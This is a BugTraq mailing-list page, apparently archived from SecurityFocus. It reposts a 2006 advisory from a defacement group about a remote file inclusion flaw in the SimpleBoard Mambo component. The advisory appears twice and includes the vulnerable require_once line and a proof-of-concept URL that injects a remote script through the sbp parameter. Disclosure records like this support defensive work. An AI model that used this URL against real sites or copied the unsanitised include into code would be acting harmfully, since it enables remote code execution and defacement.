Threat level definition
Search:
Home
Bugtraq
Vulnerabilities
Mailing Lists
Jobs
Tools
Beta Programs
News
Infocus
Foundations
Microsoft
Unix
IDS
Incidents
Virus
Pen-Test
Firewalls
Columnists
Mailing Lists
Newsletters
Bugtraq
Focus on IDS
Focus on Linux
Focus on Microsoft
Forensics
Pen-test
Security Basics
Vuln Dev
Vulnerabilities
Jobs
Job Opportunities
Resumes
Job Seekers
Employers
Tools
RSS
News
Vulns
Security Research
BugTraq
Back to list
|
Post reply
SimpleBoard Mambo Component 1.1.0 Remote File Include
Sep 09 2006 10:55PM
stormhacker hotmail com
[W]orld [D]efacers Team
======================================
--------------------Summary----------------
eVuln ID: WD23
Vendor: SimpleBoard Mambo Component 1.1.0
Vendor's Web Site: mamboxchange.com/projects/simpleboard
Class: Remote
PoC/Exploit: Available
Solution: Not Available
Discovered by: rUnViRuS (worlddefacers.de)
-----------------Description---------------
require_once("$sbp/sb_helpers.php");
--------------PoC/Exploit----------------------
http://website.com/components/com_simpleboard/file_upload.php?sbp=[evil_
script]
--------------Solution---------------------
No Patch available.
--------------Credit-----------------------
Discovered by: rUnViRuS (worlddefacers.de)
[ reply ]
Privacy Statement
Copyright 2009, SecurityFocus
======================================
--------------------Summary----------------
eVuln ID: WD23
Vendor: SimpleBoard Mambo Component 1.1.0
Vendor's Web Site: mamboxchange.com/projects/simpleboard
Class: Remote
PoC/Exploit: Available
Solution: Not Available
Discovered by: rUnViRuS (worlddefacers.de)
-----------------Description---------------
require_once("$sbp/sb_helpers.php");
--------------PoC/Exploit----------------------
http://website.com/components/com_simpleboard/file_upload.php?sbp=[evil_
script]
--------------Solution---------------------
No Patch available.
--------------Credit-----------------------
Discovered by: rUnViRuS (worlddefacers.de)
[ reply ]